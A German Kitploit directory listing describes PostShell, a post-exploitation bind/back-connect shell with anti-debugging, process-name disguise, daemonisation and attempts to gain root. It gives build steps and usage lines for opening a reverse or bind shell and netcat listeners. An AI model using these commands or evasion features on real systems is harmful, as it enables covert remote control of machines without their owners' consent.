Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
postshell — PostShell - Post-Exploitation-Bind/Backconnect-Shell | Kitploit
Tools/GitHubGitHub/rek7/postshell
Privilege EscalationPayload-GenerierungPersistenzmechanismenShellcodePost-ExploitationCommand and ControlRed TeamingAnti-Bot
GitHubrek7/postshell

postshell

PostShell - Post-Exploitation-Bind/Backconnect-Shell

Repository anzeigen
8119vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PostShell

PostShell ist eine Post-Exploitation-Shell, die sowohl eine Bind-Shell als auch eine Back-Connect-Shell umfasst. Sie erstellt ein vollständig interaktives TTY, das Job Control ermöglicht. Die Stub-Größe beträgt etwa 14 KB und kann auf jedem Unix-ähnlichen System kompiliert werden.

Screenshots

Screenshot Banner und Interaktion mit der Shell nach dem Herstellen einer Verbindung.

Warum keine traditionelle Backconnect-/Bind-Shell verwenden?

PostShell erleichtert die Post-Exploitation, indem der Angreifer weniger auf Abhängigkeiten wie Python und Perl angewiesen ist. Es integriert sowohl eine Back-Connect- als auch eine Bind-Shell, sodass ein Operator, falls ein Ziel keine ausgehenden Verbindungen zulässt, einfach eine Bind-Shell starten und sich remote mit dem Rechner verbinden kann. PostShell ist zudem deutlich unauffälliger als eine traditionelle Shell, da sowohl der Prozessname als auch die Argumente verschleiert werden.

Funktionen

  • Anti-Debugging – Wenn erkannt wird, dass ptrace an die Shell angehängt ist, wird sie beendet.
  • Prozess-/Threadnamen werden verschleiert – ein gefälschter Name überschreibt alle Systemargumente und den Dateinamen, sodass es wie ein legitimes Programm wirkt.
  • TTY – Ein TTY wird erstellt, das im Wesentlichen die gleiche Nutzung des Rechners wie bei einer SSH-Verbindung ermöglicht.
  • Bind-/Backconnect-Shell – Sowohl eine Bind-Shell als auch eine Back-Connect-Shell können erstellt werden.
  • Kleine Stub-Größe – Es wird normalerweise ein sehr kleiner Stub (<14 KB) erzeugt.
  • Automatische Daemonisierung
  • Versucht, GUID/UID auf 0 (root) zu setzen.

Erste Schritte

  1. Herunterladen: git clone https://github.com/rek7/postshell
  2. Kompilieren: cd postshell && sh compile.sh Dadurch sollte eine Binärdatei namens "stub" erstellt werden – dies ist die Malware.

Befehle

root@kitploit:~
$ ./stub
Bind Shell Verwendung: ./stub port
Back Connect Verwendung: ./stub ip port
$

Beispielverwendung

Backconnect:

root@kitploit:~
$ ./stub 127.0.0.1 13377

Bind Shell:

root@kitploit:~
$ ./stub 13377

Empfangen einer Verbindung mit Netcat

Empfangen eines Backconnects:

root@kitploit:~
$ nc -vlp port

Verbinden mit einer Bind Shell:

root@kitploit:~
$ nc host port

TODO:

  • Domainauflösung hinzufügen
Tool herunterladen